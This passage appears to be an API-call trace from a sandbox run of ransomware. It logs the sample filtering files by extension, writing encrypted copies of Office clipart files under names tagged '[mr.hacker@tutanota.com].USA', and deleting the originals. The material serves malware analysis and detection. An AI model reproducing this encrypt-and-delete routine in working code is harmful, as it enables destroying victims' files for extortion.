[0268.412] lstrcmpiW (lpString1=".xlsx", lpString2="T.WMF") returned -1 [0268.412] lstrlenW (lpString=".ppt") returned 4 [0268.412] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0268.412] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF") returned 62 [0268.412] lstrlenW (lpString=".zip") returned 4 [0268.412] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0268.412] lstrlenW (lpString=".rar") returned 4 [0268.412] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0268.412] lstrlenW (lpString=".bz2") returned 4 [0268.412] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0268.413] lstrlenW (lpString=".7z") returned 3 [0268.413] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0268.413] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF") returned 62 [0268.413] lstrlenW (lpString=".dbf") returned 4 [0268.413] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0268.413] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF") returned 62 [0268.413] lstrlenW (lpString=".1cd") returned 4 [0268.413] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0268.413] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF") returned 62 [0268.413] lstrlenW (lpString=".jpg") returned 4 [0268.413] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0268.413] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF") returned 62 [0268.413] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF") returned 62 [0268.413] lstrlenW (lpString=".doc") returned 4 [0268.413] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0268.413] lstrlenW (lpString=".docx") returned 5 [0268.413] lstrcmpiW (lpString1=".docx", lpString2="T.WMF") returned -1 [0268.413] lstrlenW (lpString=".pdf") returned 4 [0268.413] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0268.413] lstrlenW (lpString=".xls") returned 4 [0268.413] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0268.413] lstrlenW (lpString=".xlsx") returned 5 [0268.413] lstrcmpiW (lpString1=".xlsx", lpString2="T.WMF") returned -1 [0268.413] lstrlenW (lpString=".ppt") returned 4 [0268.413] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0268.413] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF") returned 62 [0268.413] lstrlenW (lpString=".zip") returned 4 [0268.414] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0268.414] lstrlenW (lpString=".rar") returned 4 [0268.414] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0268.414] lstrlenW (lpString=".bz2") returned 4 [0268.414] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0268.414] lstrlenW (lpString=".7z") returned 3 [0268.414] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0268.414] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF") returned 62 [0268.414] lstrlenW (lpString=".dbf") returned 4 [0268.414] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0268.414] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF") returned 62 [0268.414] lstrlenW (lpString=".1cd") returned 4 [0268.414] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0268.414] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\CUPINST.WMF") returned 62 [0268.414] lstrlenW (lpString=".jpg") returned 4 [0268.414] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0268.414] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0268.414] lstrlenW (lpString="DD00405_.WMF") returned 12 [0268.414] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00405_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0268.415] GetFileSizeEx (in: hFile=0x2b4, lpFileSize=0x2abff1c | out: lpFileSize=0x2abff1c*=17584) returned 1 [0268.415] CloseHandle (hObject=0x2b4) returned 1 [0268.415] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00405_.wmf")) returned 0x20 [0268.415] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00405_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0268.415] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00405_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0268.415] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0268.415] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0268.415] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00405_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0268.416] GetLastError () returned 0x0 [0268.416] ReadFile (in: hFile=0x2b4, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x44b0, lpOverlapped=0x0) returned 1 [0268.418] WriteFile (in: hFile=0x39c, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0x44c0, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0x44c0, lpOverlapped=0x0) returned 1 [0268.419] ReadFile (in: hFile=0x2b4, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x0, lpOverlapped=0x0) returned 1 [0268.419] WriteFile (in: hFile=0x39c, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0xec, lpOverlapped=0x0) returned 1 [0268.419] SetEndOfFile (hFile=0x39c) returned 1 [0268.419] CloseHandle (hObject=0x39c) returned 1 [0268.419] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0268.419] SetEndOfFile (hFile=0x2b4) returned 1 [0268.423] CloseHandle (hObject=0x2b4) returned 1 [0268.423] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0268.423] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00405_.wmf")) returned 1 [0268.423] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF") returned 63 [0268.423] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF") returned 63 [0268.423] lstrlenW (lpString=".doc") returned 4 [0268.424] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0268.424] lstrlenW (lpString=".docx") returned 5 [0268.424] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0268.424] lstrlenW (lpString=".pdf") returned 4 [0268.424] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0268.424] lstrlenW (lpString=".xls") returned 4 [0268.424] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0268.424] lstrlenW (lpString=".xlsx") returned 5 [0268.424] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0268.424] lstrlenW (lpString=".ppt") returned 4 [0268.424] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0268.424] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF") returned 63 [0268.424] lstrlenW (lpString=".zip") returned 4 [0268.424] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0268.424] lstrlenW (lpString=".rar") returned 4 [0268.424] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0268.424] lstrlenW (lpString=".bz2") returned 4 [0268.424] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0268.424] lstrlenW (lpString=".7z") returned 3 [0268.424] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0268.424] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF") returned 63 [0268.424] lstrlenW (lpString=".dbf") returned 4 [0268.424] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0268.424] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF") returned 63 [0268.424] lstrlenW (lpString=".1cd") returned 4 [0268.425] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0268.425] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF") returned 63 [0268.425] lstrlenW (lpString=".jpg") returned 4 [0268.425] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0268.425] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF") returned 63 [0268.425] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF") returned 63 [0268.425] lstrlenW (lpString=".doc") returned 4 [0268.425] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0268.425] lstrlenW (lpString=".docx") returned 5 [0268.425] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0268.425] lstrlenW (lpString=".pdf") returned 4 [0268.425] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0268.425] lstrlenW (lpString=".xls") returned 4 [0268.425] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0268.425] lstrlenW (lpString=".xlsx") returned 5 [0268.425] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0268.425] lstrlenW (lpString=".ppt") returned 4 [0268.425] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0268.425] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF") returned 63 [0268.425] lstrlenW (lpString=".zip") returned 4 [0268.425] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0268.425] lstrlenW (lpString=".rar") returned 4 [0268.425] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0268.425] lstrlenW (lpString=".bz2") returned 4 [0268.425] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0268.425] lstrlenW (lpString=".7z") returned 3 [0268.425] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0268.425] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF") returned 63 [0268.425] lstrlenW (lpString=".dbf") returned 4 [0268.425] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0268.426] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF") returned 63 [0268.426] lstrlenW (lpString=".1cd") returned 4 [0268.426] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0268.426] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00405_.WMF") returned 63 [0268.426] lstrlenW (lpString=".jpg") returned 4 [0268.426] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0268.426] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0268.426] lstrlenW (lpString="DD00407_.WMF") returned 12 [0268.426] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00407_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0268.426] GetFileSizeEx (in: hFile=0x2b4, lpFileSize=0x2abff1c | out: lpFileSize=0x2abff1c*=7828) returned 1 [0268.426] CloseHandle (hObject=0x2b4) returned 1 [0268.426] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00407_.wmf")) returned 0x20 [0268.426] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00407_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0268.427] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00407_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0268.427] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0268.427] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0268.427] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00407_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0268.427] GetLastError () returned 0x0 [0268.427] ReadFile (in: hFile=0x2b4, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x1e94, lpOverlapped=0x0) returned 1 [0268.429] WriteFile (in: hFile=0x39c, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0x1ea0, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0x1ea0, lpOverlapped=0x0) returned 1 [0268.429] ReadFile (in: hFile=0x2b4, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x0, lpOverlapped=0x0) returned 1 [0268.430] WriteFile (in: hFile=0x39c, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0xec, lpOverlapped=0x0) returned 1 [0268.430] SetEndOfFile (hFile=0x39c) returned 1 [0268.430] CloseHandle (hObject=0x39c) returned 1 [0268.430] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0268.430] SetEndOfFile (hFile=0x2b4) returned 1 [0268.432] CloseHandle (hObject=0x2b4) returned 1 [0268.432] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0268.433] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00407_.wmf")) returned 1 [0268.433] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF") returned 63 [0268.433] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF") returned 63 [0268.433] lstrlenW (lpString=".doc") returned 4 [0268.433] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0268.433] lstrlenW (lpString=".docx") returned 5 [0268.433] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0268.433] lstrlenW (lpString=".pdf") returned 4 [0268.433] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0268.433] lstrlenW (lpString=".xls") returned 4 [0268.433] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0268.433] lstrlenW (lpString=".xlsx") returned 5 [0268.433] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0268.433] lstrlenW (lpString=".ppt") returned 4 [0268.433] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0268.433] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF") returned 63 [0268.433] lstrlenW (lpString=".zip") returned 4 [0268.433] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0268.433] lstrlenW (lpString=".rar") returned 4 [0268.434] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0268.434] lstrlenW (lpString=".bz2") returned 4 [0268.434] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0268.434] lstrlenW (lpString=".7z") returned 3 [0268.434] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0268.434] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF") returned 63 [0268.434] lstrlenW (lpString=".dbf") returned 4 [0268.434] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0268.434] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF") returned 63 [0268.434] lstrlenW (lpString=".1cd") returned 4 [0268.434] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0268.434] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF") returned 63 [0268.434] lstrlenW (lpString=".jpg") returned 4 [0268.434] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0268.434] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF") returned 63 [0268.434] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF") returned 63 [0268.434] lstrlenW (lpString=".doc") returned 4 [0268.434] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0268.434] lstrlenW (lpString=".docx") returned 5 [0268.434] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0268.434] lstrlenW (lpString=".pdf") returned 4 [0268.434] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0268.434] lstrlenW (lpString=".xls") returned 4 [0268.434] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0268.434] lstrlenW (lpString=".xlsx") returned 5 [0268.434] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0268.435] lstrlenW (lpString=".ppt") returned 4 [0268.435] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0268.435] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF") returned 63 [0268.435] lstrlenW (lpString=".zip") returned 4 [0268.435] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0268.435] lstrlenW (lpString=".rar") returned 4 [0268.435] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0268.435] lstrlenW (lpString=".bz2") returned 4 [0268.435] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0268.435] lstrlenW (lpString=".7z") returned 3 [0268.435] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0268.435] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF") returned 63 [0268.435] lstrlenW (lpString=".dbf") returned 4 [0268.435] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0268.435] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF") returned 63 [0268.435] lstrlenW (lpString=".1cd") returned 4 [0268.435] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0268.435] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00407_.WMF") returned 63 [0268.435] lstrlenW (lpString=".jpg") returned 4 [0268.435] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0268.435] lstrcmpiW (lpString1=".WMF", lpString2=".USA") returned 1 [0268.435] lstrlenW (lpString="DD00413_.WMF") returned 12 [0268.435] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00413_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0268.436] GetFileSizeEx (in: hFile=0x2b4, lpFileSize=0x2abff1c | out: lpFileSize=0x2abff1c*=42992) returned 1 [0268.436] CloseHandle (hObject=0x2b4) returned 1 [0268.436] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00413_.wmf")) returned 0x20 [0268.437] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00413_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0268.437] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00413_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0268.437] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0268.437] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0268.437] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00413_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x39c [0268.437] GetLastError () returned 0x0 [0268.437] ReadFile (in: hFile=0x2b4, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0xa7f0, lpOverlapped=0x0) returned 1 [0268.439] WriteFile (in: hFile=0x39c, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0xa800, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0xa800, lpOverlapped=0x0) returned 1 [0268.440] ReadFile (in: hFile=0x2b4, lpBuffer=0x3210020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2abfed4, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesRead=0x2abfed4*=0x0, lpOverlapped=0x0) returned 1 [0268.440] WriteFile (in: hFile=0x39c, lpBuffer=0x3210020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2abfc9c, lpOverlapped=0x0 | out: lpBuffer=0x3210020*, lpNumberOfBytesWritten=0x2abfc9c*=0xec, lpOverlapped=0x0) returned 1 [0268.440] SetEndOfFile (hFile=0x39c) returned 1 [0268.441] CloseHandle (hObject=0x39c) returned 1 [0268.441] SetFilePointerEx (in: hFile=0x2b4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2abfec8 | out: lpNewFilePointer=0x0) returned 1 [0268.441] SetEndOfFile (hFile=0x2b4) returned 1 [0268.685] CloseHandle (hObject=0x2b4) returned 1 [0268.685] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0268.765] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd00413_.wmf")) returned 1 [0268.765] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF") returned 63 [0268.765] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF") returned 63 [0268.765] lstrlenW (lpString=".doc") returned 4 [0268.765] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0268.765] lstrlenW (lpString=".docx") returned 5 [0268.765] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0268.765] lstrlenW (lpString=".pdf") returned 4 [0268.765] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0268.765] lstrlenW (lpString=".xls") returned 4 [0268.765] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0268.766] lstrlenW (lpString=".xlsx") returned 5 [0268.766] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0268.766] lstrlenW (lpString=".ppt") returned 4 [0268.766] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0268.766] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD00413_.WMF") returned 63 [0268.766] lstrlenW (lpString=".zip") returned 4 [0268.766] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0268.766] lstrlenW (lpString=".rar") returned 4 [0268.766] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0268.766] lstrlenW (lpString=".bz2") returned 4 [0268.766] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0268.766] 